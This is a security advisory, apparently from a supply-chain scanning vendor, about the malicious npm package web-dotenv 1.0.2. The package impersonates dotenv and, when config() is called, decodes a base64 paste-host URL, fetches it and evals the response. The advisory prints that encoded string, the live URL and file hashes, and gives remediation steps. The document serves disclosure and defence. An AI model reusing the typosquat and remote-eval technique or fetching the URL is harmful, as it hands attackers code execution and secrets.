Which versions of web-dotenv are malicious?

The following npm versions of web-dotenv are flagged malicious: 1.0.2. Treat any of these as compromised.

How do I remediate web-dotenv if I installed it?

Remove web-dotenv from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is web-dotenv part of a known attack campaign?

Yes — web-dotenv is associated with the IN-MAL-2026-004695, GHSA-7x3f-hjp7-r53g campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect web-dotenv in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking web-dotenv and packages like it before any post-install script runs.

Malicious package

web-dotenvnpm

Malicious code in web-dotenv (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4728

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall web-dotenv

What this malware does

web-dotenv impersonates the widely-used dotenv package: its package.json copies dotenv's repository (git://github.com/motdotla/dotenv.git) and homepage (github.com/motdotla/dotenv#readme), and the source is otherwise a verbatim copy of dotenv with one injected function. The package's primary documented entry point, config(), calls configfix() in lib/main.js, which base64-decodes the string CWh0dHBzOi8vd3d3Lmpzb25rZWVwZXIuY29tL2IvVktVTkk= to https://www.jsonkeeper.com/b/VKUNI, fetches that URL via axios, and passes the response body directly to eval. jsonkeeper.com is an anonymous, mutable paste host: the attacker can swap the executed JavaScript at any time without republishing the package. Any project that installs web-dotenv expecting dotenv-compatible behavior and calls .config() (i.e., the normal first line of any dotenv consumer) will execute attacker-controlled code in the Node process, with full access to environment variables, filesystem, and outbound network. Three independent attack signals stack: typosquat of a top-tier package, base64-obfuscated URL, and remote eval of mutable third-party content.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

1 flagged

1.0.2

Indicators of compromise (SHA-256)

edd19476eeb1c31707abe6fac6f52dbd1950a0dc25f4854ea5269d6400f8ea37

91770cff2a99007b7479336034dc9ad4f71575a2876a4ace5ffe3a05362f94a4

Frequently asked questions

No. web-dotenv on npm has been identified as a malicious package (version 1.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004695GHSA-7x3f-hjp7-r53g

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection